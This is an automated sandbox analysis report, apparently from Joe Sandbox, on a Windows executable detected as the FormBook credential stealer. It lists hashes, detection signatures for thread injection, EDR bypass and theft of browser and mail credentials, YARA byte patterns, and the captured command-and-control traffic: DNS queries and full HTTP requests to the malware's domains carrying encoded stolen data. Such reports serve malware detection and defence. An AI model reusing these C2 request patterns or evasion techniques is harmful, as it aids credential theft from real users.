Windows Analysis Report
P030092024LANDWAY.exe

Overview

General Information

Sample name: P030092024LANDWAY.exe
Analysis ID: 1522543
MD5: 3ffb03ef28aff93d8cd6b83911d700ee
SHA1: 4322b8a74fed0809dca565feff13bae1c60196d4
SHA256: 0efac5788be9dbd7b74affa2c8f6c14a2b6cce84d981d0b088566e50eefc72e4
Tags: exeuser-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • P030092024LANDWAY.exe (PID: 504 cmdline: "C:\Users\user\Desktop\P030092024LANDWAY.exe" MD5: 3FFB03EF28AFF93D8CD6B83911D700EE)
    • svchost.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\P030092024LANDWAY.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • BpYpWzndkWcpUJ.exe (PID: 3880 cmdline: "C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdl32.exe (PID: 612 cmdline: "C:\Windows\SysWOW64\cmdl32.exe" MD5: BD60DF43E6419AFE39B3FCBFB14077E7)
          • BpYpWzndkWcpUJ.exe (PID: 2360 cmdline: "C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5940 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.svchost.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.svchost.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2e223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16532:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 2.2.svchost.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.svchost.exe.400000.0.raw.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2f023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17332:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ParentImage: C:\Users\user\Desktop\P030092024LANDWAY.exe, ParentProcessId: 504, ParentProcessName: P030092024LANDWAY.exe, ProcessCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ProcessId: 2644, ProcessName: svchost.exe
            Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ParentImage: C:\Users\user\Desktop\P030092024LANDWAY.exe, ParentProcessId: 504, ParentProcessName: P030092024LANDWAY.exe, ProcessCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ProcessId: 2644, ProcessName: svchost.exe


            AV Detection

            Source: P030092024LANDWAY.exe, Virustotal: Detection: 29%
            Source: P030092024LANDWAY.exe, ReversingLabs: Detection: 28%
            Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: P030092024LANDWAY.exe, Joe Sandbox ML: detected
            Source: P030092024LANDWAY.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BpYpWzndkWcpUJ.exe, 00000006.00000000.2409444434.000000000084E000.00000002.00000001.01000000.00000005.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4601455514.000000000084E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0271C1A0 FindFirstFileW,FindNextFileW,FindClose (7_2_0271C1A0)
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 4x nop then xor eax, eax (7_2_02709BF0)
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 4x nop then mov ebx, 00000004h (7_2_045204E8)
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Code function: 4x nop then pop edi (9_2_05035E34)
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Code function: 4x nop then mov esp, ebp (9_2_050336E6)
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Code function: 4x nop then pop edi (9_2_05034B6C)
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Code function: 4x nop then xor eax, eax (9_2_050393A6)

            Networking

            Source: DNS query: www.030002837.xyz
            Source: DNS query: www.restobarbebek.xyz
            Source: DNS query: www.rtpterbaruwaktu3.xyz
            Source: Joe Sandbox View, IP Address: 172.191.244.62
            Source: Joe Sandbox View, IP Address: 65.21.196.90
            Source: Joe Sandbox View, ASN Name: ATT-INTERNET4US
            Source: Joe Sandbox View, ASN Name: LGDACOMLGDACOMCorporationKR
            Source: Joe Sandbox View, ASN Name: CP-ASDE
            Source: Joe Sandbox View, ASN Name: OCENET-AS-APOCESdnBhdISPMY
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /u1fq/?YDT4P=4xd8DzO&9jtPKX=8UziavWSK51wGh0yfoTPy09mw+AH3TZF6FMeVKjGe1eDtK62tODY8LE6LrUWxP2eUghCVKFR11/7ghpDkFpQ+ayhRkiuH+sQiiZHhsOmXN2fYM4UxJmKdMp/tZGxM5I0WcTc5ok= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dguy4youguys.wtfConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /chjf/?9jtPKX=XAGDPb2hYSNA1G205B9yTUGnAX8dO+7zB1cLVHckxJo5ahU/aASovO/kl86KK2t3BQ9RD7nwrojXFmbxG19h+PHx3PeB45qZXKA/WsiIO1RcOY79PupkSKjjj5g2/+z2ZvrlzLs=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.8zu934.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /pzb3/?YDT4P=4xd8DzO&9jtPKX=cGw2exDyh1KVkWsHkX4xj4lgVlPPukG30+Eeh6IH5uNyYRC1xGnnB8QFExEpiTL5bcBgsA98LG9yqfxBLyBILpDqP6cmLzlnqu2CIAVnl8NdZZMCWNNFkUmCCHKhOgovLr644XM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.tophfy.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /zl45/?9jtPKX=n8oXMK/zoXm+9Sf+Cf+3HqD48reH4J6cLbqP6V+sjhkAIyrgNn1URxDPpIGDIxJivz/4HVO+PmZpgKq+kRyFpOwr2F+KRn2bmC2fKgazXZTeNyaA5M+5Xps7rgsZqfJ/BnEswgE=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.030002837.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /6a3e/?9jtPKX=BZZMppAtEsJZC+SCGnDJwYc0a7P3I2XUnV0yTl1cw/B5eiAAMyS7zeU40ykuIimpo83S7m3PRw3Wl4+UmttGxit0iCQT0nNXqtGO1eivbt9K3y3Fy6qkJMw6sxrg0uoowV+p4EU=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.x4wrqqc2tn.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /ecky/?9jtPKX=E8yFMNT5NJgwX+ypl/nybltVULshlwvllIqWYsZuB87EHRd+pdJnIfFxHoxvfPrOXGrS+SNOBaUo3+/x93yIjDBeJAA65d0dctOoKHWlJneMt2c+UnLgAV484ZeCTpIzlpd+zvA=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.it9.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /huyu/?9jtPKX=6Z1wBk7RYwBPGlswbf+1K+rZouoL6hxCsE01bzPZVmnRPi6w4QFoc0Kr9wwe5SYV2Krnjruyq1yW2kXKM8ywVSDOHER5s93YVzLABz8XusiexAKM+GOGLDXayUXcrjkYWYPbXVo=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.18kwatch.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /ojw7/?9jtPKX=Oep6mOdcbJS8M33gn6lJDCgdhZprpWT1xYap2DCm99RWzR/+rod5DkimcY1te6tRP4YAPOidnC7q9fyBbp+p4w7BxYlfBAVSQr378a/zqULvDaURYind12ZcUgt4zzVfKlFhbII=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.accupower.techConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /ym4w/?YDT4P=4xd8DzO&9jtPKX=LS2dTmeF3OBn8G1tQUmCXYTIgtzicGlzjT2aVYBBrxZqGpjDVT9zDZ74on3XL6wvhAoqbJrICZyPh8boIihM0FmnY1HfyNJnnrRiM85d/p0/MDPjGflqx28U0PmHY+963/VActc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.restobarbebek.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /84h5/?9jtPKX=m90qfEx2Waj4M3qzKISaRwMNBxrGGJIjHL8e3ySRPK8oLcpI6mSZixZy+bRbuIjP1deJ2nKHD1dx+QvwZSZ/OQME4y6EqRE6EL+tH5CvtKetzx16bnZNcksA/ftcr1t/EGD4XGU=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cqghwamc.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /k9l7/?9jtPKX=iU7xlsxzkrYOaJ03UWKIE/axiGr8zrmLGOQkbwAH5ClgHUe+YliICefp5kzZp7Bcmm3TqloUqqhUnmvDpapz/R4DhNtLZW/YFSxpez1iYQ5aBHFQdfaf/M2d0rHEzcblh7f2Iqc=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.yesonkoicasino.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /v6un/?9jtPKX=chrVZ32YOFiHcRt+pEb6q26+CAONXtiHqnqOnPUfdfA3+GbGusUCqNq3OHoqQeyHuv1nxnx1V1BB8mdZJamKpk9z9Ox4e3tyzXPmXAU3O+O4NKGvlCfVuqLBbErpx4XOfLWdLVU=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.rtpterbaruwaktu3.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /zeyp/?9jtPKX=Qp4X+LIjfewVnP6Y/skPG2AcibCDaQ9iuVCW0N7JhhnFM66mIUNO5YOiETDrAwi/zOtbLxRIZ8WmNUxfXqqXG7p6mEX8KWQILlPapVZ7FdK1llaTtR9WIeGVSAX1maOrISYOTkE=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mondayigboleague.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficDNS traffic detected: DNS query: www.dguy4youguys.wtf
            Source: global trafficDNS traffic detected: DNS query: www.8zu934.vip
            Source: global trafficDNS traffic detected: DNS query: www.tophfy.info
            Source: global trafficDNS traffic detected: DNS query: www.030002837.xyz
            Source: global trafficDNS traffic detected: DNS query: www.x4wrqqc2tn.sbs
            Source: global trafficDNS traffic detected: DNS query: www.it9.shop
            Source: global trafficDNS traffic detected: DNS query: www.18kwatch.com
            Source: global trafficDNS traffic detected: DNS query: www.accupower.tech
            Source: global trafficDNS traffic detected: DNS query: www.restobarbebek.xyz
            Source: global trafficDNS traffic detected: DNS query: www.cqghwamc.top
            Source: global trafficDNS traffic detected: DNS query: www.yesonkoicasino.net
            Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mondayigboleague.info
            Source: unknownHTTP traffic detected: POST /chjf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.8zu934.vipOrigin: http://www.8zu934.vipReferer: http://www.8zu934.vip/chjf/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 211User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Data Ascii: 9jtPKX=aCujMsa6QgBo3k6V1QpjcAWLbHAZaJmFKmYyXGJPhJNFDRMKbh61vsrBts2mJncTKi56Jojsk5LeaCLLBS15je3txtiDwIOER4YdZeaqP3hvNIzJC+UODLTg6oo+2vvucP/D79xts4LWwIWSVW05NbFr8MWcDRz3I92oc4PIuIGaT0v2ITvGZqnneBuJHSzbmWXNPSf2BfyK
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 30 Sep 2024 08:41:53 GMTContent-Length: 19Connection: closeData Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:25 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:30 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:25 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:27 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
